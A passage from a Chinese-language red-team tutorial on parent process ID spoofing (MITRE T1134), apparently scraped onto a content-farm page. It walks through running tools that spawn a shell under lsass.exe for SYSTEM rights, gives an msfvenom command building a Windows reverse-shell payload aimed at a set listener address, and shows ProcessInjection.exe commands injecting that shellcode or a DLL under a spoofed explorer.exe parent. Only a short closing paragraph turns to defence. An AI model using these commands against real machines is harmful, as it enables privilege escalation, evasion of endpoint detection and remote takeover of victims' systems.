T1134 紅隊技術-父進程欺騙( 三 )

2026-04-27 生活經驗紅隊

T1134 紅隊技術-父進程欺騙

文章插圖
可以看到在lsass.exe下成功創建了子進程，因為lsass.exe是system權限，所以反彈shell也獲取到了system權限。

T1134 紅隊技術-父進程欺騙

文章插圖

T1134 紅隊技術-父進程欺騙

文章插圖
方法四（使用C#程序進行PID欺騙）
py7hagoras開發了GetSystem項目，是上述技術的C#實現，可以在這里找到：***/py7hagoras/GetSystem.git
在目標機上下載GetSystem.exe，然后執行GetSystem.exe 自定義程序 -O 目標進程名
GetSystem.exe shell.exe -O lsass

T1134 紅隊技術-父進程欺騙

文章插圖

T1134 紅隊技術-父進程欺騙

文章插圖

T1134 紅隊技術-父進程欺騙

文章插圖
注意：這里可能也需要繞過UAC或者提權，不然執行不成功。
方法五（通過PID欺騙注入Shellcode）
Chirag Savla 使用 C# 開發了一個名為“ProcessInjection”的出色工具，它可以執行許多功能，包括通過 PID 欺騙進行的進程注入。通過提供有效的 PID，該工具會嘗試使用 CreateProcess 等原生 API 調用來欺騙 PID，然后將代碼注入其中。該工具支持 hex、C 和 base64 格式的shellcode ，也可以選擇 DLL 注入。工具在這里下載：***/3xpl01tc0d3r/ProcessInjection
首先，使用msfvenom創建一個shellcode代碼
msfvenom -p windows/x64/shell_reverse_tcp -exitfunc=thread LHOST=172.19.218.248 LPORT=7777 -f hex > /hex.txt然后在目標機中下載

T1134 紅隊技術-父進程欺騙

文章插圖
使用ProcessInjection.exe進行注入
ProcessInjection.exe /ppath:"C:\Windows\System32\calc.exe" /path:"hex.txt" /parentproc:explorer /f:hex /t:1參數說明：
/ppath：目標 EXE 的進程路徑（需要注入進程的路徑）
/path：shellcode文件路徑
/parentproc：父進程名稱，目標EXE應在此進程下生成
/f：shellcode文件類型
/t：注入技術

支持的五種注入方式：
1) Vanilla Process Injection
2) DLL Injection
3) Process Hollowing
4) APC Queue
5) Dynamic Invoke - Vanilla Process Injection

T1134 紅隊技術-父進程欺騙

文章插圖
我們可以看到calc.exe在explorer.exe下，而shellcode則在calc.exe中執行。

T1134 紅隊技術-父進程欺騙

文章插圖

T1134 紅隊技術-父進程欺騙

文章插圖
也可以進行DLL注入
ProcessInjection.exe /ppath:"C:\Windows\System32\calc.exe" /path:"shell.dll" /parentproc:explorer /t:2

T1134 紅隊技術-父進程欺騙

文章插圖

T1134 紅隊技術-父進程欺騙

文章插圖

T1134 紅隊技術-父進程欺騙

文章插圖

其他工具
***/Mr-Un1k0d3r/RemoteProcessInjection
***/xpn/getsystem-offline
***/hlldz/APC-PPID
***/ewilded/PPID_spoof
***/christophetd/spoofing-office-macro （VBA實現）
在Metasploit中Meterpreter 可以使用migrate命令或者后滲透模塊post/windows/manage/migrate也可以實現進程遷移。
總結
攻擊者廣泛使用該技術進行檢測規避，并增加了應急響應人員檢測IoC的時間。針對許多過時的和未打補丁的EDR解決方案，可以使用此技術輕松規避檢測。通過本文，告訴大家在組織中應該使用最新的EDR解決方案以及在可以捕捉此類技術的優質產品中使用智能檢測功能的重要性。

推薦閱讀

上一篇：六級聽力選項規律六級聽力怎么提高

下一篇：oppoa30免打擾模式怎么關